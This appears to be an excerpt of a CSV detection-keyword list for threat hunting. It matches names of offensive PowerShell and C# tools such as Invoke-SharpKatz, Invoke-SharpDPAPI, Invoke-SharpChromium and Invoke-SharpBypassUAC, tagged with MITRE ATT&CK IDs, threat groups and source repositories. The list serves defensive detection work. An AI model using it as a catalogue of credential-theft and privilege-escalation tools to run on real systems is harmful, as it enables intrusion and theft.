"*invokesharefinder*",".{0,1000}invokesharefinder.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","49556" "*Invoke-ShareFinder*",".{0,1000}Invoke\-ShareFinder.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - 
T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","49557" "*Invoke-ShareFinder*",".{0,1000}Invoke\-ShareFinder.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","49558" "*Invoke-ShareFinder*",".{0,1000}Invoke\-ShareFinder.{0,1000}","offensive_tool_keyword","Jira-Lens","finds (non-standard) shares on hosts in the local domain","T1083 - T1065 - T1204 - T1087 - T1203","TA0007 - TA0005 - TA0001","N/A","N/A","Reconnaissance","https://powersploit.readthedocs.io/en/stable/Recon/README/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","49559" "*Invoke-ShareFinder*",".{0,1000}Invoke\-ShareFinder.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49560" "*Invoke-ShareFinder*",".{0,1000}Invoke\-ShareFinder.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","49561" "*Invoke-ShareHunter *",".{0,1000}Invoke\-ShareHunter\s.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - 
T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","0","N/A","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","49562" "*Invoke-ShareHunter *",".{0,1000}Invoke\-ShareHunter\s.{0,1000}","offensive_tool_keyword","Invoke-ShareHunter","Enumerate the Domain for Readable and Writable Shares","T1135","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ShareHunter","1","0","N/A","N/A","5","1","17","1","2025-02-18T14:56:51Z","2023-09-21T14:31:17Z","49563" "*Invoke-ShareHunter.ps1*",".{0,1000}Invoke\-ShareHunter\.ps1.{0,1000}","offensive_tool_keyword","Invoke-ShareHunter","Enumerate the Domain for Readable and Writable Shares","T1135","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ShareHunter","1","1","N/A","N/A","5","1","17","1","2025-02-18T14:56:51Z","2023-09-21T14:31:17Z","49564" "*Invoke-SharpAllowedToAct*",".{0,1000}Invoke\-SharpAllowedToAct.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49565" "*Invoke-SharpBlock*",".{0,1000}Invoke\-SharpBlock.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49566" "*Invoke-SharpBypassUAC*",".{0,1000}Invoke\-SharpBypassUAC.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation 
tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49567" "*Invoke-SharpChiselClient*",".{0,1000}Invoke\-SharpChiselClient.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49568" "*Invoke-SharpChiselClient.ps1*",".{0,1000}Invoke\-SharpChiselClient\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - 
T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49569" "*Invoke-SharpChromium*",".{0,1000}Invoke\-SharpChromium.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49570" "*Invoke-SharpClipboard*",".{0,1000}Invoke\-SharpClipboard.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation 
tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49571" "*Invoke-SharpCloud*",".{0,1000}Invoke\-SharpCloud.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49572" "*Invoke-SharpCloud*",".{0,1000}Invoke\-SharpCloud.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49573" "*Invoke-Sharpcradle*",".{0,1000}Invoke\-Sharpcradle.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49574" "*Invoke-SharpDPAPI*",".{0,1000}Invoke\-SharpDPAPI.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49575" "*Invoke-SharpDump*",".{0,1000}Invoke\-SharpDump.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp 
Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49576" "*Invoke-SharPersist*",".{0,1000}Invoke\-SharPersist.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49577" "*Invoke-SharpGPO*",".{0,1000}Invoke\-SharpGPO.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49578" "*Invoke-SharpGPOAbuse*",".{0,1000}Invoke\-SharpGPOAbuse.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49579" "*Invoke-SharpGPO-RemoteAccessPolicies*",".{0,1000}Invoke\-SharpGPO\-RemoteAccessPolicies.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation 
tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49580" "*Invoke-SharpHandler*",".{0,1000}Invoke\-SharpHandler.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49581" "*Invoke-SharpHide*",".{0,1000}Invoke\-SharpHide.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49582" "*InvokeSharpHound*",".{0,1000}InvokeSharpHound.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","49583" "*InvokeSharpHound*",".{0,1000}InvokeSharpHound.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - 
Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","49584" "*Invoke-Sharphound*",".{0,1000}Invoke\-Sharphound.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49585" "*Invoke-Sharphound2*",".{0,1000}Invoke\-Sharphound2.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49586" "*Invoke-Sharphound3*",".{0,1000}Invoke\-Sharphound3.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49587" "*Invoke-SharpHound4*",".{0,1000}Invoke\-SharpHound4.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49588" 
"*Invoke-Sharphound4*",".{0,1000}Invoke\-Sharphound4.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49589" "*Invoke-SharpImpersonation*",".{0,1000}Invoke\-SharpImpersonation.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49590" "*Invoke-SharpImpersonation*",".{0,1000}Invoke\-SharpImpersonation.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49591" "*Invoke-SharpImpersonationNoSpace*",".{0,1000}Invoke\-SharpImpersonationNoSpace.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49592" "*Invoke-SharpKatz*",".{0,1000}Invoke\-SharpKatz.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - 
TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49593" "*Invoke-SharpLdapRelayScan*",".{0,1000}Invoke\-SharpLdapRelayScan.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49594" "*Invoke-SharpLdapRelayScan*",".{0,1000}Invoke\-SharpLdapRelayScan.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49595" "*Invoke-Sharplocker*",".{0,1000}Invoke\-Sharplocker.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49596" "*Invoke-SharpLoginPrompt*",".{0,1000}Invoke\-SharpLoginPrompt.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49597" 
"*Invoke-SharpLoginPrompt.ps1*",".{0,1000}Invoke\-SharpLoginPrompt\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49598" "*Invoke-SharpMove*",".{0,1000}Invoke\-SharpMove.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49599" 
"*Invoke-SharpPrinter*",".{0,1000}Invoke\-SharpPrinter.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49600" "*Invoke-SharpPrinter*",".{0,1000}Invoke\-SharpPrinter.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49601" "*Invoke-SharpPrintNightmare*",".{0,1000}Invoke\-SharpPrintNightmare.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49602" 